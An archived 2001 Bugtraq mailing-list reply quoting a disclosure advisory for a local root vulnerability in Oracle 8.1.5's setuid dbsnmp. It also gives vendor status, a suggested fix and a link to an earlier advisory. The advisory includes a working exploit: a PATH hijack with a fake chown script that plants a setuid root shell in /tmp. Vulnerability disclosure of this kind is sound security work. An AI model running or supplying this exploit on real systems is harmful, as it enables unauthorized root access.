OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Aaron C. Newman (aaronnewman-family.com)
Date: Wed Aug 01 2001 - 13:12:22 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    Funny to see Oracle's canned response to this. I'm not 100% sure this is
    exactly the same problem, but I worked with them fixing what looks like the
    same problem back in 1999. They provided a patch way back then - might be
    that whoever respond to you is not "up to speed".

    See the advisory dated August 23, 1999
    http://xforce.iss.net/alerts/advise36.php

    Aaron C. Newman
    CTO/Founder
    Application Security, Inc.
    212-490-6022
    anewmanappsecinc.com
    www.appsecinc.com
    -Protection Where It Counts-

    -----Original Message-----
    From: bugtraq-return-1460-aaron=newman-family.comsecurityfocus.com
    [mailto:bugtraq-return-1460-aaron=newman-family.comsecurityfocus.com]On
    Behalf Of Ismael Briones
    Sent: Wednesday, August 01, 2001 1:14 PM
    To: bugtraqsecurityfocus.com
    Subject: Oracle 8.1.5 dbnsmp vulnerability

    Title: Vulnerability in dbsnmp in Oracle 8.1.5
    Date: 01-08-2001
    Platform: Only tested in Digital Unix.
    Impact: Any user can gain root privileges
    Author: Ismael Briones Vilar (ismaelel-mundo.net)
    Status: Vendor Contacted, and they are investigating a fix .

    PROBLEM SUMMARY:

        There is a problem in dbsnmp that can be used by local users to obtain
    root privileges. The dbsnmp is setuid root. When a user execute dbsnmp there
    is a call to chown and chgrp, but without especify the path, so any user can
    define his PATH variable to exploit this vulnerability:

         Probed in Oracle 8.1.5.
         Oracle 8.1.6 is not vulnerable

    IMPACT:

       Any user with local access, can gain root privileges

    SOLUTION:

       Maybe a chmod -s

    STATUS:

       Vendor was contacted 30/07/2001 and Oracle answer:

            "We are investigating a fix as we speak."

    EXPLOIT:

    export PATH=~/bin/:$PATH

    Then we create the file ~/bin/chown or ~/bin/chgrp:

    #!/bin/sh
    cp /bin/sh /tmp/XXX;chmod 4755 /tmp/XXX

    (We have to put all in the same line, separated by semicolon)

    We make our chown or chgrp executable:

    chmod +x ~/bin/chown

    chmod +x ~/bin/chgrp

    When the user execute dbsnmp, the system look for chown in the first
    directory of the PATH variable, execute our chown file and whe have a shell
    setuid root in /tmp/XXX.

    -------------------------
            Ismael Briones Vilar
            ismaelel-mundo.net